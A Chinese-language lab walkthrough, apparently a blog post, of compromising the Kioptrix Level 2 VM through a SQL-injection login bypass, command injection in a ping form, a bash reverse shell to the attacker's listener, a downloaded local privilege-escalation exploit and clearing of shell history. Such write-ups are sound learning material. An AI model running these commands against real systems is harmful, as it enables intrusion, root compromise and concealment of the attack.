#渗透测试 kioptix level 2靶机通关教程及提权

声明!

文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!!!

工具链接:https://pan.quark.cn/s/530656ba5503

一、准备阶段

复现请将靶机ip换成自己的

kali: 192.168.108.130

靶机:192.168.108.136

1. 找出ip端口和服务信息

扫出ip

复制代码
nmap -sn 192.168.108.0/24

扫出端口

复制代码
nmap -p 1-65535 192.168.108.136

一般扫描出端口后,尝试去访问web页面,但是只有一个登录界面

端口对应服务信息

复制代码
nmap -sV 192.168.108.136

服务信息

复制代码
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
111/tcp  open  rpcbind  2 (RPC #100000)
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
631/tcp  open  ipp      CUPS 1.1
3306/tcp open  mysql    MySQL (unauthorized)

可利用信息

OpenSSH 3.9p1

Apache httpd 2.0.52

MySQL (unauthorized)

CUPS 1.1

2. 目录扫描

复制代码
dirb http://192.168.108.136/

可以看到扫出很多目录,但都是在**http://192.168.108.136/manual** 这个大目录下

访问此目录**http://192.168.108.136/manual**,寻找可能利用的信息

3. 漏洞扫描

nmap扫描漏洞

复制代码
nmap 192.168.108.136 -p 22,80,111,443,631,3306 -oA --script=vuln

会有很多漏洞

searchsploit查找漏洞

复制代码
searchsploit Apache httpd 2.0.52
searchsploit OpenSSH 3.9p1
searchsploit MySQL (unauthorized)
searchsploit CUPS 1.1

二、获取权限

1. 访问web服务

结合开放的mysql3306 端口,可以尝试sql注入攻击,

输入万能密码尝试

出现以下界面

可以看到是要进行ping命令,但是没有ping的框架,

查看源代码发现以下信息

发现登录框被闭合了

方法1

打开burpsuite抓包,在拦截设置,选择拦截响应包

点击此处,然后关闭拦截即可

删除' 然后放包

此时就可以进行ping了

方法2

找到需要插入的地方,右键编辑html 将代码复制到这里,并将align='center> 修改align="center">

可以看到也是可以的

2. ping命令

在ping之前先了解一下url中的的一些符号

复制代码
;     前面的执行完执行后面的
|     管道符,上一条命令的输出,作为下一条命令的参数(显示后面的执行结果)         
||    当前面的执行出错时(为假)执行后面的
&     将任务置于后台执行
&&    前面的语句为假则直接出错,后面的也不执行,前面只能为真
%0a  (换行)
%0d  (回车)

ping靶机

输入以下命令

复制代码
192.168.108.136;ls

发现成功回显,并且经过测试,并不存在过滤的情况

3. 反弹shell

这里我们使用bash反弹

开启监听端口,端口选用kali空闲端口即可

复制代码
nc -lvvp 4444

执行以下代码

复制代码
127.0.0.1;bash -i >& /dev/tcp/192.168.108.130/4444 0>&1
/dev/tcp/你的kali的ip/开启的端口

可以看到反弹成功

三、提权

查询版本信息

复制代码
uname -a
lsb_release -a

信息如下

复制代码
Linux kioptrix.level2 2.6.9-55.EL
Distributor ID: CentOS
Description:    CentOS release 4.5 (Final)
Release:        4.5

可以知道是centos4.5版本,查找该版本漏洞

找到漏洞利用脚本

利用searchsploit命令下载脚本,这里可以看我之前总结的命令使用详情
searchsploit命令大全

复制代码
searchsploit centos 4.5 -m 9542.c  

下载成功

开启web服务

复制代码
sudo python -m http.server 80

成功上传

在目标主机上下载脚本

复制代码
cd /tmp
wget http://192.168.108.130:80/9542.c

下载成功

编译脚本

复制代码
gcc 9542.c
chamod 777 a.out
./a.out

提权成功

可以看到是有命令记录的,为了更严谨,最后每次复现完,退出的时候清除历史命令

复制代码
history -c
相关推荐
CHICX122914 小时前
2.MySQL 手工注入:从原理到 sqli-labs 实战
web安全·网络安全
菩提小狗15 小时前
每日安全情报报告 · 2026-04-07
网络安全·漏洞·cve·安全情报·每日安全
m0_7381207215 小时前
渗透基础知识ctfshow——Web应用安全与防护(第一章)
服务器·前端·javascript·安全·web安全·网络安全
聚铭网络16 小时前
聚铭网络荣获《一种安全事件误报的研判方法及系统》发明专利
网络安全
CDN36017 小时前
游戏盾与支付 / 广告 SDK 冲突:依赖顺序与隔离方案(踩坑实录)
运维·游戏·网络安全
vortex518 小时前
从应用层到内核层:SOCKS 代理与 TUN 模式全解析
网络·网络安全·渗透测试
hzxpaipai18 小时前
2026 杭州外贸网站制作公司哪家好?派迪科技确实有点技术
前端·科技·网络协议·网络安全
特别关注外国供应商21 小时前
SSH 的 PrivX OT 工业安全远程访问 (ISRA) 被 分析机构 Industrial Cyber 认可
人工智能·网络安全·ssh·特权访问管理·工业安全远程访问·privx·ot 访问安全
M建21 小时前
核心交换机安全实战:内网隔离 + 端口封堵 + 白名单放行全配置
运维·网络安全·交换机
hzxpaipai21 小时前
英语+越南语网站架构设计:派迪科技多语言建站实践解析
网络·科技·物联网·网络安全·https